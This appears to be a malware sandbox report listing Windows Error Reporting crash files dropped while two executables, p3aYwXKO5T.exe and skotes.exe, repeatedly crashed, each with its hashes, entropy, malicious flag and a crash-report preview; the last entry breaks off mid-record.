C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_26959f14-b1e3-4dfc-977a-d6b37ebf56ed\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	65536
Entropy (8bit):	0.9982452006510579
Encrypted:	false
SSDEEP:	192:W1Qb3IFwt056rAj/1nZrSQmgzuiFBZ24IO8+f:yJFwu56rAjZzuiFBY4IO8+
MD5:	2F331D962CC650F0EBA4D6D5429963C0
SHA1:	117B187B3CBC8885B4C3B70471A6F915E2E839B9
SHA-256:	49E6651E3A282A0EC903F0B2FC108E208328C20696E695CFF732AB80A310DD60
SHA-512:	5E99C61E44EB9D1E7FA1355BCDC42311A811715D66676BA4BD98765946909BEAE3C79C2ADCA3AF2711B5D17E490FC7F8DD53DBAB86784B4327956DE2A2BFA931
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.9.9.2.3.9.9.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.9.5.9.f.1.4.-.b.1.e.3.-.4.d.f.c.-.9.7.7.a.-.d.6.b.3.7.e.b.f.5.6.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.d.c.3.7.a.c.-.6.d.3.d.-.4.5.1.0.-.a.f.9.3.-.1.6.c.d.f.6.e.f.c.9.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_3bf719fb-40db-4ba8-9620-738d2049b21e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9064131062362792
Encrypted:	false
SSDEEP:	192:3db3Ik2wt056rAj/1nZrSQdzuiFBZ24IO8+:Ok2wu56rAjjzuiFBY4IO8+
MD5:	E6F7CAD53CC856D3A26779C54B4EC7B8
SHA1:	8A2EABD053871BF24D2F8918765F97BD7232DAD7
SHA-256:	A60CDB6E9EB74DA8FED2CE565C0084EEA7D5ABF0CA8115C11AC23C9D5808074F
SHA-512:	6C651A977A5AADE7B4CDB2C65F5B979E71B18C9B3B9C3A26E32FAAD32AB2CFCC5790A37050F25DCE4C2386F075AC77B4876EBD94FB87ACDA579C63AB18BBE6B4
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.6.4.7.4.3.7.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.f.7.1.9.f.b.-.4.0.d.b.-.4.b.a.8.-.9.6.2.0.-.7.3.8.d.2.0.4.9.b.2.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.b.7.b.c.d.5.-.a.3.d.2.-.4.d.1.4.-.a.e.1.0.-.b.5.3.8.0.6.8.0.0.a.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_6a3dd91d-87cf-4339-a240-a0ce1f09b8dc\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8652363485196614
Encrypted:	false
SSDEEP:	96:aIuTU+3IvskhqwoA7Jf9QXIDcQnc6rCcEhcw3rL+HbHg/8BRTf3o8Fa9OyRgEVs5:2b3Ivwt056rAj/1qzuiFBZ24IO8+
MD5:	16F85D48B2E17C5293CC7552246C476D
SHA1:	0ADEA6A1F45AF33D02BF17EC8FB82E6DF3B3E169
SHA-256:	67350F43941EE45FB799818392B582B15A77429096F23FF4679F658A7090A6B6
SHA-512:	591EF20EEEE0FD4B54F2412225B3867F9D6BC4C50DC01F6721D880C30B6239409E699AB0DB4EE3E1F4674AFE6CD3EED8E3346F2F8A2B816C05B26872F6259F58
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.2.8.4.4.6.9.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.3.d.d.9.1.d.-.8.7.c.f.-.4.3.3.9.-.a.2.4.0.-.a.0.c.e.1.f.0.9.b.8.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.9.2.5.3.0.0.-.e.2.e.d.-.4.3.6.c.-.b.c.2.5.-.2.5.d.8.3.c.6.a.7.e.7.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_75365df1-5378-4519-9779-2764413d9978\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8904474460401064
Encrypted:	false
SSDEEP:	192:qRb3Ik2wt056rAj/1nZrHzuiFBZ24IO8+:qak2wu56rAjXzuiFBY4IO8+
MD5:	CD0259C48C50A4380F88B1084ABFDA92
SHA1:	5B73ED078068FA94F0DD7B38F0B6441DA595A1EF
SHA-256:	A980832FFD14AB3F925F022C6786B8791C3B1790354DC7F5B00D51459BBB261B
SHA-512:	0D81BAAA26E853D6E44635E65D708F6F5549FC8D79B201EB4549AEE472BF510F1A7845BC35396CF139C343502F95DA0F992D4C5D7B18E73B8B21940E3A9809BE
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.4.8.0.5.2.5.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.3.6.5.d.f.1.-.5.3.7.8.-.4.5.1.9.-.9.7.7.9.-.2.7.6.4.4.1.3.d.9.9.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.c.2.7.d.2.6.-.b.4.e.5.-.4.5.0.b.-.a.0.d.b.-.4.d.0.7.2.8.0.e.9.e.b.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_790c495c-a558-4326-8bf7-54f23c25712a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8973465041974188
Encrypted:	false
SSDEEP:	96:hltU+3IZuskhqwoA7Jf9QXIDcQnc6rCcEhcw3rL+HbHg/8BRTf3o8Fa9OyRgEVs/:hb3Igwt056rAj/1nZrGzuiFBZ24IO8+
MD5:	448B3ADD7966E96E3934E6FEE63A63E9
SHA1:	67A1381921199DC506C47DB945C4995F8F64DE5E
SHA-256:	631238797B3AD92969989E4FF00887D7AD0F821D0AAA798672E574B73D77A63D
SHA-512:	6A9B2BC7EF4BDC4D226EB91A420E89AAF399772BCB29BA08E0D442E5B07A5A3613C0B131F8ADAAD8D67E08884809CC615CAFE4DC9072637F9B98DEC3FD25E9F5
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.5.5.3.0.1.3.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.0.c.4.9.5.c.-.a.5.5.8.-.4.3.2.6.-.8.b.f.7.-.5.4.f.2.3.c.2.5.7.1.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.f.0.b.5.a.c.-.d.b.0.9.-.4.8.2.5.-.a.0.2.d.-.5.5.e.1.2.7.5.4.e.c.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_a893414a-5aa6-4a61-8118-d344bc6c0651\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9985444254736072
Encrypted:	false
SSDEEP:	192:yb3Itwt056rAj/1nZrSQmgzuiFBZ24IO8+:vtwu56rAjZzuiFBY4IO8+
MD5:	445F5BF0116C49685678D67DD732CCBA
SHA1:	D8BBF336104D4E318C05AE676D307D1699C23132
SHA-256:	BF5219D1BA7B5106474F61A7571526EA478DE0F244718A27DE28C91835F78EA2
SHA-512:	EE913D0DE26EA70B13BAF2CDDBF0A1DD8AE1F4AC7EFEC9C031D849F32527EA4D8122CFE03002185FB78777E717675F70FD35AF3CBF96167C92E28876E690692B
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.8.5.2.8.4.3.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.9.3.4.1.4.a.-.5.a.a.6.-.4.a.6.1.-.8.1.1.8.-.d.3.4.4.b.c.6.c.0.6.5.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.3.4.7.7.9.b.-.f.e.2.f.-.4.5.5.3.-.9.8.b.e.-.b.6.d.d.5.5.d.8.d.9.9.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_ecc606bd-04cb-4ad5-9c3e-d14d1d254d43\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9777648106414171
Encrypted:	false
SSDEEP:	192:1b3IDwt056rAj/1nZrSQlzuiFBZ24IO8+:mDwu56rAjLzuiFBY4IO8+
MD5:	AE9496AC3954DBEE5058E02318AE8ACB
SHA1:	C7B09404DBB15DD6AC43DF2E058EA12F0CCC00D1
SHA-256:	5977434A3CEFEB566B321895BF4C55E178BEF2B552790B683ECE94F7A4D8300D
SHA-512:	90A7BD746B2868EE874CFEDA2317173B7F529AB5F0EA2A81D9280796F10BA1CD688A617EBC5FBC80C408E2B458E3C2864398433F1484E8B72350BF90AA62AE00
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.7.8.3.0.5.9.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.c.6.0.6.b.d.-.0.4.c.b.-.4.a.d.5.-.9.c.3.e.-.d.1.4.d.1.d.2.5.4.d.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.7.b.1.b.d.f.-.5.6.2.1.-.4.a.0.e.-.a.8.7.5.-.4.6.9.1.c.9.f.f.9.9.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_156860db-0bc0-4e41-b7c6-903726266438\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7705808502090912
Encrypted:	false
SSDEEP:	96:plzUZIsohqwoA7Jf9QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFEOyKZj8OWJqsr:LzU2Et056rwjuezuiFBZ24IO8nI
MD5:	77671C44751E7C0653B3DBED858DC33E
SHA1:	86D3B299DC14EAD9150A38E48B6A3FDED9731411
SHA-256:	CD33D93D357288C8A07EE237715C2765AA9F567D68DBED9BA15FC2A7479BA330
SHA-512:	D92201CA3E5E41FF72E6D30756CAF3F12269544D0105FE04885EBFAD3D77BF8FB50D2E2003FBD42BD266012C17AAFA024C4BFC04187B221661B2F617B73389FB
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.4.4.2.5.2.1.2.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.6.8.6.0.d.b.-.0.b.c.0.-.4.e.4.1.-.b.7.c.6.-.9.0.3.7.2.6.2.6.6.4.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.6.3.f.b.0.9.-.e.b.6.b.-.4.a.2.1.-.8.4.f.1.-.6.0.c.3.d.d.9.d.4.3.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.c.-.0.0.0.1.-.0.0.1.4.-.a.2.1.9.-.1.7.0.4.1.0.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_99c65e1a-ffe2-4de3-871c-0a5eee8df84f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8207383198182296
Encrypted:	false
SSDEEP:	96:BZkzU2sohqwoA7Jf9QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFEOyKZj8OWJqsR:PkzU2Et056rwjuUzuiFBZ24IO8nI
MD5:	A0D7E1E57E587BF14B8AC89B5AAE0DE7
SHA1:	A7112C9260BC93EB0A5B798340D262454D7AF913
SHA-256:	EABC8841451D4483BC9E380BDC865F856CC9182DC232F8EB4B3B42FD5C5940EB
SHA-512:	2D11F18565157816C1E710C55CF33015899C15C17E9B78584A38D8E317809D6A615A0BA015EC2B0E82AB70567D8F8C6EB8BDE5DA3194AFFB29199F98746B5522
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.4.6.9.9.7.0.0.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.c.6.5.e.1.a.-.f.f.e.2.-.4.d.e.3.-.8.7.1.c.-.0.a.5.e.e.e.8.d.f.8.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.4.b.f.7.5.b.-.7.d.2.b.-.4.e.f.3.-.9.0.9.e.-.1.6.d.8.e.f.e.2.4.e.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.c.-.0.0.0.1.-.0.0.1.4.-.a.2.1.9.-.1.7.0.4.1.0.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_ad27e63f-16e9-412d-ae61-dc44aa9e2cee\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8205046940550333
Encrypted:	false
SSDEEP:	96:B5MazUNsohqwoA7Jf9QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFEOyKZj8OWJqw:UazUNEt056rwjuUzuiFBZ24IO8nI
MD5:	B189D59CDD7990402BAE9999E7E7A003
SHA1:	FE48A7037FEADD5AEBF72601620C5EAB6A3351AE
SHA-256:	591BC145967CEC69A18FD01854CB6ADC2A55F36A3A4AA21917740E08DCD401F6
SHA-512:	9156958322F52A9FC7708507DA12863FFC45E75F54E7397EDCB9E73CD4D91F60BA4F6935DF1CABE0EB2194B8E6048210309BDA0D721605D37B15D5860D1782FC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.4.6.3.7.2.4.8.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.2.7.e.6.3.f.-.1.6.e.9.-.4.1.2.d.-.a.e.6.1.-.d.c.4.4.a.a.9.e.2.c.e.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.a.0.5.4.3.9.-.e.d.9.b.-.4.e.7.f.-.8.d.8.a.-.8.1.5.1.2.4.2.6.c.d.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.c.-.0.0.0.1.-.0.0.1.4.-.a.2.1.9.-.1.7.0.4.1.0.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_53d0242d6f2929c1eab1bd80215eefe2448897_360c380b_fdd1cbc7-4de7-4dd1-a680-853a1c90eb95\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8210598452293519
